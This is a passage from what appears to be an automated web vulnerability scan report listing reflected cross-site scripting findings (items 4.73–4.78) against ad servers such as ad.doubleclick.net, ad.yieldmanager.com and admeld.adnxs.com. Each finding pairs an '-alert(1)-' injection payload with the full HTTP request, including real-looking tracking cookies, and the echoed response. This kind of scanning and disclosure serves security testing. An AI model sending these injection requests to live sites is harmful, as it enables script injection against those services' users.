User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6725

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=130519866726706'-alert(1)-'78f402d040&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.73. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fffd8"-alert(1)-"2804db10e66 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667fffd8"-alert(1)-"2804db10e66&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667fffd8"-alert(1)-"2804db10e66&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscU
...[SNIP]...

4.74. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3db8"-alert(1)-"90fc3118986 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoc3db8"-alert(1)-"90fc3118986&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
v8/3b05/7/121/%2a/g%3B240678286%3B0-0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoc3db8"-alert(1)-"90fc3118986&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&
...[SNIP]...

4.75. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48f94'-alert(1)-'590fb15d724 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto48f94'-alert(1)-'590fb15d724&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
v8/3b05/7/121/%2a/g%3B240678286%3B0-0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto48f94'-alert(1)-'590fb15d724&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&
...[SNIP]...

4.76. http://ad.doubleclick.net/adj/fbn [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fbn

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbd21'-alert(1)-'2002c00180f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/fbn;pos=kontera;sz=1x1;ord=504013981?&dbd21'-alert(1)-'2002c00180f=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 342

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/y;225079562;0-0;1;22018143;31-1/1;36828959/36846837/1;;~okv=;pos=kontera;sz=1x1;;dbd21'-alert(1)-'2002c00180f=1;~aopt=2/1/9e/0;~sscs=%3fhttp://www.foxnews.com">
...[SNIP]...

4.77. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed949"-alert(1)-"308f54cef8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1&ed949"-alert(1)-"308f54cef8d=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!Q!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; pv1="b!!!!:!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:46 GMT
Pragma: no-cache
Content-Length: 4432
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
k=0;var rm_tag_type="";rm_pop_frequency = 0; rm_pop_times = 1; rm_pop_nofreqcap = 1; rm_pop_id = 1748713; rm_tag_type = "pop"; rm_url = "http://ad.yieldmanager.com/imp?Z=0x0&anmember=541&anprice=&y=29&ed949"-alert(1)-"308f54cef8d=1&s=1748713&_salt=2823841568";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

4.78. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2784'-alert(1)-'79a228804ed was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193f2784'-alert(1)-'79a228804ed&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
